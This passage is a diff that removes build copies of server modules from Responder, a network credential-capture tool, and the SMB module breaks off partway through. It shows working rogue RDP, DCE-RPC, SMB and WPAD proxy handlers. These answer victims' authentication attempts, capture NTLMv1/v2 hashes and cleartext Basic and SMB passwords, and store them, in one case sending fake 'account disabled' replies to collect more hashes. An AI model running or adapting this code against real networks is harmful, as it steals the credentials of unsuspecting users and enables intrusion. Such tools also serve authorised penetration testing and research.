Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
if NTLM_Auth:
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == b'\x01':
if settings.Config.Verbose:
print(text("[Proxy-Auth] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))
Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
Buffer.calculate()
Buffer_Ans = WPAD_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
return Buffer_Ans
if Packet_NTLM == b'\x03':
NTLM_Auth = b64decode(''.join(NTLM_Auth))
ParseHTTPHash(NTLM_Auth, Challenge, client, "Proxy-Auth")
GrabUserAgent(data)
GrabCookie(data)
GrabHost(data)
#Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject) #While at it, grab some SMB hashes...
#Buffer.calculate()
#Return a TCP RST, so the client uses direct connection and avoids disruption.
return RST
else:
return IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)# Didn't work? no worry, let's grab hashes via SMB...
elif Basic_Auth:
GrabUserAgent(data)
GrabCookie(data)
GrabHost(data)
ClearText_Auth = b64decode(''.join(Basic_Auth).encode('latin-1'))
SaveToDb({
'module': 'Proxy-Auth',
'type': 'Basic',
'client': client,
'user': ClearText_Auth.decode('latin-1').split(':')[0],
'cleartext': ClearText_Auth.decode('latin-1').split(':')[1],
})
return False
else:
if settings.Config.Basic:
Response = WPAD_Basic_407_Ans()
if settings.Config.Verbose:
print(text("[Proxy-Auth] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
else:
Response = WPAD_Auth_407_Ans()
return str(Response)
class Proxy_Auth(BaseRequestHandler):
def handle(self):
try:
Challenge = RandomChallenge()
while True:
self.request.settimeout(3)
remaining = 10*1024*1024 #setting max recieve size
data = ''
while True:
buff = ''
buff = NetworkRecvBufferPython2or3(self.request.recv(8092))
if buff == '':
break
data += buff
remaining -= len(buff)
#check if we recieved the full header
if data.find('\r\n\r\n') != -1:
#we did, now to check if there was anything else in the request besides the header
if data.find('Content-Length') == -1:
#request contains only header
break
else:
#searching for that content-length field in the header
for line in data.split('\r\n'):
if line.find('Content-Length') != -1:
line = line.strip()
remaining = int(line.split(':')[1].strip()) - len(data)
if remaining <= 0:
break
if data == "":
break
else:
Buffer = PacketSequence(data,self.client_address[0], Challenge)
self.request.send(NetworkSendBufferPython2or3(Buffer))
except:
pass

146
build/lib/Responder/servers/RDP.py
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@ -1,146 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import *
import struct
import re
import ssl
import codecs
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from Responder.packets import TPKT, X224, RDPNEGOAnswer, RDPNTLMChallengeAnswer
cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
def ParseNTLMHash(data,client, Challenge): #Parse NTLMSSP v1/v2
SSPIStart = data.find(b'NTLMSSP')
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
LMHash = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
SaveToDb({
'module': 'RDP',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'RDP',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
def FindNTLMNegoStep(data):
NTLMStart = data.find(b'NTLMSSP')
NTLMString = data[NTLMStart:]
NTLMStep = NTLMString[8:12]
if NTLMStep == b'\x01\x00\x00\x00':
return NTLMStep
if NTLMStep == b'\x03\x00\x00\x00':
return NTLMStep
else:
return False
class RDP(BaseRequestHandler):
def handle(self):
try:
data = self.request.recv(1024)
self.request.settimeout(30)
Challenge = RandomChallenge()
cert = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(cert, key)
if data[11:12] == b'\x01':
x = X224(Data=RDPNEGOAnswer())
x.calculate()
h = TPKT(Data=x)
h.calculate()
buffer1 = str(h)
self.request.send(NetworkSendBufferPython2or3(buffer1))
SSLsock = context.wrap_socket(self.request, server_side=True)
SSLsock.settimeout(30)
data = SSLsock.read(8092)
if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
x.calculate()
SSLsock.write(NetworkSendBufferPython2or3(x))
data = SSLsock.read(8092)
if FindNTLMNegoStep(data) == b'\x03\x00\x00\x00':
ParseNTLMHash(data,self.client_address[0], Challenge)
##Sometimes a client sends a routing cookie; we don't want to miss that let's look at it the other way around..
if data[len(data)-4:] == b'\x03\x00\x00\x00':
x = X224(Data=RDPNEGOAnswer())
x.calculate()
h = TPKT(Data=x)
h.calculate()
buffer1 = str(h)
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(8092)
SSLsock = context.wrap_socket(self.request, server_side=True)
data = SSLsock.read(8092)
if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
x.calculate()
SSLsock.write(NetworkSendBufferPython2or3(x))
data = SSLsock.read(8092)
if FindNTLMNegoStep(data) == b'\x03\x00\x00\x00':
ParseNTLMHash(data,self.client_address[0], Challenge)
else:
return False
except:
pass

214
build/lib/Responder/servers/RPC.py
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@ -1,214 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import *
import struct
import re
import ssl
import codecs
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from Responder.packets import RPCMapBindAckAcceptedAns, RPCMapBindMapperAns, RPCHeader, NTLMChallenge, RPCNTLMNego
NDR = "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60" #v2
Map = "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36" #v1
MapBind = "\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa"
#for mapper
DSRUAPI = "\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2" #v4
LSARPC = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab" #v0
NETLOGON = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb" #v1
WINSPOOL = "\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09" #v1
def Chose3264x(packet):
if Map32 in packet:
return Map32
else:
return Map64
def FindNTLMOpcode(data):
SSPIStart = data.find(b'NTLMSSP')
if SSPIStart == -1:
return False
SSPIString = data[SSPIStart:]
return SSPIString[8:12]
def ParseRPCHash(data,client, Challenge): #Parse NTLMSSP v1/v2
SSPIStart = data.find(b'NTLMSSP')
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
LMHash = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
SaveToDb({
'module': 'DCE-RPC',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'DCE-RPC',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
class RPCMap(BaseRequestHandler):
def handle(self):
try:
data = self.request.recv(1024)
self.request.settimeout(5)
Challenge = RandomChallenge()
if data[0:3] == b"\x05\x00\x0b":#Bind Req.
#More recent windows version can and will bind on port 135...Let's grab it.
if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
n.calculate()
RPC = RPCNTLMNego(Data=n)
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
ParseRPCHash(data, self.client_address[0], Challenge)
self.request.close()
if NetworkSendBufferPython2or3(Map) in data:# Let's redirect to Mapper.
RPC = RPCMapBindAckAcceptedAns(CTX1UID=Map, CTX1UIDVersion="\x01\x00\x00\x00",CallID=NetworkRecvBufferPython2or3(data[12:16]))
if NetworkSendBufferPython2or3(NDR) in data and NetworkSendBufferPython2or3(Map) not in data: # Let's redirect to Mapper.
RPC = RPCMapBindAckAcceptedAns(CTX1UID=NDR, CTX1UIDVersion="\x02\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
if data[0:3] == b"\x05\x00\x00":#Mapper Response.
# DSRUAPI
if NetworkSendBufferPython2or3(DSRUAPI) in data:
x = RPCMapBindMapperAns()
x.calculate()
RPC = RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
print(color("[*] [DCE-RPC Mapper] Redirected %-15sto DSRUAPI auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
self.request.close()
#LSARPC
if NetworkSendBufferPython2or3(LSARPC) in data:
x = RPCMapBindMapperAns(Tower1UID=LSARPC,Tower1Version="\x00\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
print(color("[*] [DCE-RPC Mapper] Redirected %-15sto LSARPC auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
self.request.close()
#WINSPOOL
if NetworkSendBufferPython2or3(WINSPOOL) in data:
x = RPCMapBindMapperAns(Tower1UID=WINSPOOL,Tower1Version="\x01\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
x.calculate()
RPC = RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
print(color("[*] [DCE-RPC Mapper] Redirected %-15sto WINSPOOL auth server." % (self.client_address[0].replace("::ffff:","")), 3, 1))
self.request.close()
#NetLogon
if NetworkSendBufferPython2or3(NETLOGON) in data:
self.request.close()
# For now, we don't want to establish a secure channel... we want NTLM.
#x = RPCMapBindMapperAns(Tower1UID=NETLOGON,Tower1Version="\x01\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
#x.calculate()
#RPC = RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
#RPC.calculate()
#self.request.send(NetworkSendBufferPython2or3(str(RPC)))
#data = self.request.recv(1024)
#print(color("[*] [DCE-RPC Mapper] Redirected %-15sto NETLOGON auth server." % (self.client_address[0]), 3, 1))
except Exception:
self.request.close()
pass
class RPCMapper(BaseRequestHandler):
def handle(self):
try:
data = self.request.recv(2048)
self.request.settimeout(3)
Challenge = RandomChallenge()
if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
n.calculate()
RPC = RPCNTLMNego(Data=n)
RPC.calculate()
self.request.send(NetworkSendBufferPython2or3(str(RPC)))
data = self.request.recv(1024)
if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
ParseRPCHash(data, self.client_address[0], Challenge)
self.request.close()
except Exception:
self.request.close()
pass

367
build/lib/Responder/servers/SMB.py
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@ -1,367 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct, re
import codecs
from Responder.utils import *
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from random import randrange
from Responder.packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData, SMB2Header, SMB2NegoAns, SMB2Session1Data, SMB2Session2Data
def Is_Anonymous(data): # Detect if SMB auth was Anonymous
SecBlobLen = struct.unpack('<H',data[51:53])[0]
if SecBlobLen < 260:
LMhashLen = struct.unpack('<H',data[89:91])[0]
return LMhashLen in [0, 1]
elif SecBlobLen > 260:
LMhashLen = struct.unpack('<H',data[93:95])[0]
return LMhashLen in [0, 1]
def Is_LMNT_Anonymous(data):
LMhashLen = struct.unpack('<H',data[51:53])[0]
return LMhashLen in [0, 1]
#Function used to know which dialect number to return for NT LM 0.12
def Parse_Nego_Dialect(data):
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
for i in range(0, 16):
if Dialect[i] == 'NT LM 0.12':
return chr(i) + '\x00'
def midcalc(data): #Set MID SMB Header field.
return data[34:36]
def uidcalc(data): #Set UID SMB Header field.
return data[32:34]
def pidcalc(data): #Set PID SMB Header field.
pack=data[30:32]
return pack
def tidcalc(data): #Set TID SMB Header field.
pack=data[28:30]
return pack
def ParseShare(data):
packet = data[:]
a = re.search(b'(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
if a:
print(text("[SMB] Requested Share : %s" % a.group(0).decode('UTF-16LE')))
def GrabMessageID(data):
Messageid = data[28:36]
return Messageid
def GrabCreditRequested(data):
CreditsRequested = data[18:20]
if CreditsRequested == b'\x00\x00':
CreditsRequested = b'\x01\x00'
else:
CreditsRequested = data[18:20]
return CreditsRequested
def GrabCreditCharged(data):
CreditCharged = data[10:12]
return CreditCharged
def GrabSessionID(data):
SessionID = data[44:52]
return SessionID
def ParseSMBHash(data,client, Challenge): #Parse SMB NTLMSSP v1/v2
SSPIStart = data.find(b'NTLMSSP')
SSPIString = data[SSPIStart:]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
LMHash = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen]
SMBHash = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
def ParseLMNTHash(data, client, Challenge): # Parse SMB NTLMv1/v2
LMhashLen = struct.unpack('<H',data[51:53])[0]
NthashLen = struct.unpack('<H',data[53:55])[0]
Bcc = struct.unpack('<H',data[63:65])[0]
Username, Domain = tuple([e.decode('latin-1') for e in data[89+NthashLen:Bcc+60].split(b'\x00\x00\x00')[:2]])
if NthashLen > 25:
FullHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex')
LmHash = FullHash[:32].upper()
NtHash = FullHash[32:].upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), LmHash.decode('latin-1'), NtHash.decode('latin-1'))
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
if NthashLen == 24:
NtHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex').upper()
LmHash = codecs.encode(data[65:65+LMhashLen],'hex').upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash.decode('latin-1'), NtHash.decode('latin-1'), codecs.encode(Challenge,'hex').decode('latin-1'))
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
def IsNT4ClearTxt(data, client):
HeadLen = 36
if data[14:16] == "\x03\x80":
SmbData = data[HeadLen+14:]
WordCount = data[HeadLen]
ChainedCmdOffset = data[HeadLen+1]
if ChainedCmdOffset == "\x75" or ChainedCmdOffset == 117:
PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
if PassLen > 2:
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
print(text("[SMB] Clear Text Credentials: %s:%s" % (User,Password)))
WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
class SMB1(BaseRequestHandler): # SMB1 & SMB2 Server class, NTLMSSP
def handle(self):
try:
self.ntry = 0
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
Challenge = RandomChallenge()
if not data:
break
if data[0:1] == b"\x81": #session request 139
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
##Negotiate proto answer SMBv2.
if data[8:10] == b"\x72\x00" and re.search(rb"SMB 2.\?\?\?", data):
head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
t = SMB2NegoAns()
t.calculate()
packet1 = str(head)+str(t)
buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(1024)
## Nego answer SMBv2.
if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe":
head = SMB2Header(MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'))
t = SMB2NegoAns(Dialect="\x10\x02")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(1024)
## Session Setup 2 answer SMBv2.
if data[16:18] == b"\x01\x00" and data[4:5] == b"\xfe":
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), SessionID=GrabSessionID(data).decode('latin-1'),NTStatus="\x16\x00\x00\xc0")
t = SMB2Session1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
t.calculate()
packet1 = str(head)+str(t)
buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(1024)
## Session Setup 3 answer SMBv2.
if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe':
ParseSMBHash(data, self.client_address[0], Challenge)
head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data).decode('latin-1'))
t = SMB2Session2Data()
packet1 = str(head)+str(t)
buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(buffer1))
data = self.request.recv(1024)
# Negotiate Protocol Response smbv1
if data[8:10] == b'\x72\x00' and data[4:5] == b'\xff' and re.search(rb'SMB 2.\?\?\?', data) == None:
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(NetworkRecvBufferPython2or3(data)))
Body.calculate()
packet1 = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff": # Session Setup AndX Request smbv1
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",mid=midcalc(NetworkRecvBufferPython2or3(data)))
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
else:
Body = SMBSession1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
Body.calculate()
packet1 = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
data = self.request.recv(1024)
if data[8:10] == b"\x73\x00" and data[4:5] == b"\xff": # STATUS_SUCCESS
if Is_Anonymous(data):
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
packet1 = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data,self.client_address[0], Challenge)
if settings.Config.CaptureMultipleCredentials and self.ntry == 0:
# Send ACCOUNT_DISABLED to get multiple hashes if there are any
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid="\x00\x00",uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
packet1 = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(packet1))+str(packet1)
self.request.send(NetworkSendBufferPython2or3(Buffer))
self.ntry += 1
continue
# Send STATUS_SUCCESS
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(NetworkRecvBufferPython2or3(data)),tid=tidcalc(NetworkRecvBufferPython2or3(data)),uid=uidcalc(NetworkRecvBufferPython2or3(data)),mid=midcalc(NetworkRecvBufferPython2or3(data)))
Body = SMBSession2Accept()
Body.calculate()
packet1 = str(Header)+str(Body)
